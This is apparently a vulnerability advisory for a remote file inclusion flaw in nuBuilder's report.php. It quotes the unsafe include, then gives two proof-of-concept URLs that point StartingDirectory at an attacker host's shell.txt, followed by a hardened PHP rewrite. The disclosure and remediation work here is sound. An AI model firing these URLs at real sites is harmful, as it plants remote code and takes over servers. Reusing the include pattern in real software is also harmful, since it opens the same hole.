nuBuilder - Remote File Inclusion

Author: Ahlspiess
type: webapps
platform: php
date_added: 2010-07-28 
date_updated: 2010-07-28 
verified: 0 

Software: nuBuilder 10.04.x and lower (maybe)
Type: Remote File Inclusion
Download: http://sourceforge.net/projects/nubuilder/files/
Author: Ahlspiess
Email: ahlspiess@tbdsecurity.com

Vulnerable file: report.php

report.php file content:

<?php
/*
** File: report.php
** Author: nuSoftware
** Created: 2007/04/26
** Last modified: 2009/07/15
**
** Copyright 2004, 2005, 2006, 2007, 2008, 2009 nuSoftware
**
** This file is part of the nuBuilder source package and is licensed under the
** GPLv3. For support on developing in nuBuilder, please visit the nuBuilder
** wiki and forums. For details on contributing a patch for nuBuilder, please
** visit the `Project Contributions' forum.
**
** Website: http://www.nubuilder.com
** Wiki: http://wiki.nubuilder.com
** Forums: http://forums.nubuilder.com
*/

include($GLOBALS['StartingDirectory']."/database.php");  // <== interesting huh?

POC
Successfully tested against PHP config register_globals = On and Off, allow_url_include = On

register_globals = Off
http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?

register_globals = On
http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?
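The following is an added defensive example, not code from nuBuilder or from this advisory. It shows the same include rewritten so that the directory is a deploy-time constant rather than a value read from $GLOBALS, and so that the resolved path is checked to be a local file inside the application root before it is included. The constant name NU_APP_ROOT, the helper nu_safe_include_path() and the assumption that report.php lives in the application root are all hypothetical.

```php
<?php
// Added example (not nuBuilder's code): hardened replacement for the include
// at the bottom of report.php. The directory never comes from request data,
// and the resolved file must be a real local file under the application root.

// Fixed at deploy time instead of read from $GLOBALS, which register_globals,
// an extract() call or a stray assignment could otherwise have populated.
define('NU_APP_ROOT', __DIR__);   // assumption: report.php sits in the app root

/**
 * Resolve $relative against $root and return the absolute path only when it
 * is an existing regular file inside $root. Returns null in every other case.
 */
function nu_safe_include_path(string $root, string $relative): ?string
{
    // Reject anything that looks like a stream wrapper (http://, ftp://,
    // php://, data:, ...). With allow_url_include=On a wrapper here is what
    // turns a path bug into remote code execution, so refuse it regardless
    // of the ini setting.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }

    $rootReal  = realpath($root);
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($rootReal === false || $candidate === false) {
        return null;                 // missing file or unresolvable path
    }

    // Compare with the trailing separator so that /app does not match /app2.
    if (strpos($candidate, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                 // "../" sequences escaped the root
    }

    return is_file($candidate) ? $candidate : null;
}

// Vulnerable pattern from report.php, shown only for contrast:
//   include($GLOBALS['StartingDirectory']."/database.php");

// Hardened form: constant root, validated result, fail closed on any doubt.
$db = nu_safe_include_path(NU_APP_ROOT, 'database.php');
if ($db === null) {
    http_response_code(500);
    exit('configuration error');
}
include $db;
```

The check in nu_safe_include_path() is deliberately independent of php.ini: even with allow_url_include set to Off (the correct production value), refusing wrappers and confining includes to a known root means a later configuration change cannot reopen this class of bug. register_globals itself was removed in PHP 5.4, and allow_url_include has been deprecated since PHP 7.4, so on current PHP the constant-root pattern above is the only part a maintainer still needs to carry forward.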


#EOF